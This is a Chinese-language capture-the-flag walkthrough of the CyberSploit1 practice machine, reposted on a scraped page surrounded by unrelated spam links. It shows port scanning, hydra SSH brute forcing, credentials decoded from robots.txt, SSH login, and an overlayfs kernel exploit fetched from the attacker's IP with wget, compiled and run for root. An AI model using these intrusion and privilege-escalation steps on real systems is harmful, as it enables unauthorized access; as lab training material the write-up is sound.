当前位置: 首页 > news >正文

国外互联网科技网站可以做烟的网站吗

国外互联网科技网站,可以做烟的网站吗,seo技术教学视频,在网站上保存网址怎么做OSCP系列靶场-Esay-CyberSploit1 总结 getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录 提 权 思 路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权 准备工作 启动VPN 获取攻击机IP 192.168.45.220 启动靶机 获取目标机器I…OSCP系列靶场-Esay-CyberSploit1 总结 getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录 提 权 思 路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权 准备工作 启动VPN 获取攻击机IP  192.168.45.220 启动靶机 获取目标机器IP  192.168.176.92 信息收集-端口扫描 目标开放端口收集 Nmap开放端口扫描2次 ┌──(root㉿Kali)-[/home/bachang/CyberSploit1] └─# ┌──(root㉿Kali)-[/home/bachang/Blogger] └─# sudo nmap --min-rate 10000 -p- 192.168.176.92 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-23 11:45 CST Nmap scan report for 192.168.176.92 Host is up (0.30s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds 通过两次收集到的端口:→22,80 目标端口对应服务探测 # tcp探测 sudo nmap -sT -sV -O -sC -p22,80 192.168.176.92 信息收集-端口测试 两个端口的话通常突破口在80端口 22-SSH端口的信息收集 22-SSH端口版本信息与MSF利用(待定) 通过Nmap探测获得SSH的版本信息可以尝试利用 # 进入msf # 探测版本为OpenSSH 5.9p1 Debian 5ubuntu1.10 msfconsole # 搜索对应脚本 msf6 searchsploit OpenSSH 5.9p1 貌似存在用户枚举等没思路的时候可以来试试 22-SSH手动登录尝试(失败) 尝试root账户的密码爆破 ssh root192.168.176.92 -p 22 # 密码尝试 password gt; root 22-SSH弱口令爆破(挂着干别的) 尝试root账户的密码爆破利用工具hydra线程-t为6 1.hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.176.92 ssh -s 22 80-HTTP端口的信息收集 访问 http://192.168.176.92/ 发现不是一个标准的CMS从源码查看开始 信息收集-源码查看 # 包括文章中是否写明一些敏感信息 curl http://192.168.176.92:80 收集到一个用户名信息 itsskv 信息收集-目录扫描 信息收集-目录扫描初步 dirsearch -u http://192.168.176.92:80 -x 302,403 因为扫出了目录深层次的扫描待选 信息收集-目录扫描(后缀) 信息收集-目录扫描(深度/大字典) 信息收集-目录扫描(深度/大字典后缀) 信息收集-目录访问 /robots.txt端点访问 存在一串代码推测是加密带等号尝试用bashe64解密 1.Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0 base64解密 利用kali解密得到了内容确认是base64加密 ┌──(root㉿Kali)-[/home/bachang/Blogger] └─# echo Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0 | base64 -d cybersploit{youtube.com/c/cybersploit} 另外两个端点没东西 漏洞利用-getwebshell 信息泄露getwebshell 已知用户名 itsskv 和 cybersploit{youtube.com/c/cybersploit} 头脑风暴一下密码会不会和cybersploit{youtube.com/c/cybersploit}有关 之前hyrda可以爆破说明22端口是允许账号密码登录的 22-SSH账号密码登录(成功) 获取账号密码之后利用SSH进行登录 ssh itsskvspan192.168.176.92/span -p22 password gt; cybersploit (失败) password gt; cybersploit{youtube.com/c/cybersploit}(成功) 密码真长我真的会谢 内网遨游-getshell FLAG1获取 # 有2个理论上排除掉第一个找home下 itsskvspancybersploit-CTF/span:~$ find / -name local.txt 2gt;/dev/null /usr/share/checkbox/jobs/local.txt /home/itsskv/local.txt itsskvspancybersploit-CTF/span:~$ cat /home/itsskv/local.txt ********************* 信息收集-内网基础信息收集 在获取shell之后我们要进行内网信息的收集都是为了提权做准备 检测操作系统的发行版本 # 确定发行版本 较老 itsskvspancybersploit-CTF/span:~$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 12.04.5 LTS Release: 12.04 Codename: precise 查看内核版本信息 # 确定内核版本 itsskvspancybersploit-CTF/span:~$ uname -a Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 athlon i386 GNU/Linux 确认home目录下用户 itsskvspancybersploit-CTF/span:~$ ls -al /home total 16 # 有两个用户 drwxr-xr-x 22 cybersploit cybersploit 4096 Sep 4 2020 cybersploit drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 itsskv 确认home目录下是否有隐藏文件 # 例如.ssh找密码 ./*_history找历史记录等 itsskvspancybersploit-CTF/span:~$ ls -al /home/itsskv # 查看了一下没啥 drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 . drwxr-xr-x 4 root root 4096 Jun 25 2020 .. -rw------- 1 itsskv itsskv 0 Sep 4 2020 .bash_history -rw-r--r-- 1 itsskv itsskv 220 Jun 25 2020 .bash_logout -rw-r--r-- 1 itsskv itsskv 3486 Jun 25 2020 .bashrc drwx------ 14 itsskv itsskv 4096 Jun 25 2020 .cache drwx------ 9 itsskv itsskv 4096 Jun 25 2020 .config 权限提升 Linux提权-内核overlayfs提权尝试 因为发行版本较老若存在以下情况进行overlayfsLinux Kernel Version提权 系统版本Linux Kernel Version大于3.13.0小于3.19UbuntuLinux 15.04UbuntuLinux 14.10UbuntuLinux 14.10UbuntuLinux 12.04 漏洞利用-内核overlayfs提权 msfconsole msf gt; searchsploit overlayfs 结合 3.13.0-32的版本信息选择2与3 # 如果想查看msf对应的内容 cat /usr/share/exploitdb/exploits/linux/local/37292.c 将文件保存在当前目录下方便开启http服务 ┌──(root㉿Kali)-[/home/bachang/CyberSploit1] └─# cp /usr/share/exploitdb/exploits/linux/local/37292.c ./shell.c ┌──(root㉿Kali)-[/home/bachang/CyberSploit1] └─# ls hydra.restore shell.c 攻击机开启服务 1.sudo python3 -m http.server 80 目标机器 # 首先到具有权限的目录下 如/tmp itsskvspancybersploit-CTF/span:~$ cd /tmp # 下载 itsskvspancybersploit-CTF/span:/tmp$ wget http://192.168.45.220/shell.c # 给权限 itsskvspancybersploit-CTF/span:/tmp$ chmod x shell.c # 如果是c的需要进行编译 itsskvspancybersploit-CTF/span:/tmp$ gcc shell.c -o shell.c # 运行 itsskvspancybersploit-CTF/span:/tmp$ ./shell.c spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # whoami root 提权成功 FLAG2获取 # cat /root/proof.txt ********************* 完结撒花~~~ 原文地址: https://bbs.zkaq.cn/t/30873.html
http://www.tj-hxxt.cn/news/143955.html

相关文章:

  • 怎么开发销售网站怎么在手机上传百度云wordpress
  • 常州市网站建设如何设置网站名字吗
  • 三雷网站程序销售管理系统有免费版
  • 用凡科帮别人做网站浙0577 icp网站建设
  • 太原网站制作合肥最好的网站建设公司
  • php网站多语言翻译怎么做电商是什么一般是干嘛的
  • 搞笑视频素材网站免费购物网站建设的必要性
  • 优秀企业官网设计案例深圳网站营销seo电话
  • 建设部政务网站redis做缓存的网站并发数
  • html网站设计模板关于网站建设的请示范文
  • 做家装的网站有哪些内容在线看网站源码
  • 有什么公司建网站软件推广怎么做
  • php网站开发学什么网站建设出售
  • 花都移动网站建设专业的网上购物平台
  • 山东建设厅科技处网站wordpress插件库
  • 安徽省建设工程安全 协会网站seo优化技术培训中心
  • 百度统计网站网线制作的注意事项
  • 如何用jeecg建设网站wordpress如何设置关键词和描述
  • 江西省住房城乡建设厅网站工程建设数字化管理平台app下载
  • seo 网站结构多个网站 备案吗
  • 深圳网站建设 设计首选深圳市百度包头网站建设
  • 学校网站制作大悟网站制作
  • 网站色调设计方案中山 网站建设
  • 做网站大概一个月多少工资设计素材网址
  • 化妆品商城网站建设策划方案ppt在线预览wordpress
  • 乐清做网站的公司有哪些优秀网站设计赏析
  • 厂房建设招标网站博客营销是一种新兴的网络营销方式
  • 上海市建设三类人员报名网站wordpress本地打开
  • 舟山外贸建站公司公网带宽1m能建设电商网站吗
  • 无锡公司建立网站wordpress付费文章插件